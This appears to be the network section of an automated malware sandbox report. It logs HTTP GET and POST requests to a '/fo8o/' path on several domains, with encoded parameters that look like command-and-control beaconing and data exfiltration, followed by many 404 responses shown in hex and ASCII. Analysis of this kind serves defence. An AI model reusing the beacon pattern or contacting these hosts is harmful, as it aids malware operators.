Source: global traffic	HTTP traffic detected: GET /fo8o/?bD=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pCTG1dl0n9Zx5sBovXqlibLG+oTQgCZHMA1AF4xfdSZkJv4XAGCI=&VVq=lF_H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?VVq=lF_H&bD=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrJNroXeq/Q4lVX4E9J28Ip9JfR0m5D5TtgLDY+NMsBNkqmJUMcRE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?bD=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&VVq=lF_H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: unknown

DNS traffic detected: queries for: www.3xfootball.com

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.kasegitai.tokyoOrigin: http://www.kasegitai.tokyoCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 207Referer: http://www.kasegitai.tokyo/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 62 44 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38 Data Ascii: bD=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 19 Apr 2024 01:28:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 19 Apr 2024 01:28:31 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:28:47 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:28:50 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:28:53 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:28:55 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 19 Apr 2024 01:29:30 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-19T01:29:35.9678496Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 19 Apr 2024 01:29:33 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-04-19T01:29:35.9678496Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 19 Apr 2024 01:29:36 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-19T01:29:41.5103163Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 19 Apr 2024 01:29:39 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-04-19T01:29:44.2531037Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:07 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:10 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:12 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 19 Apr 2024 01:30:15 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
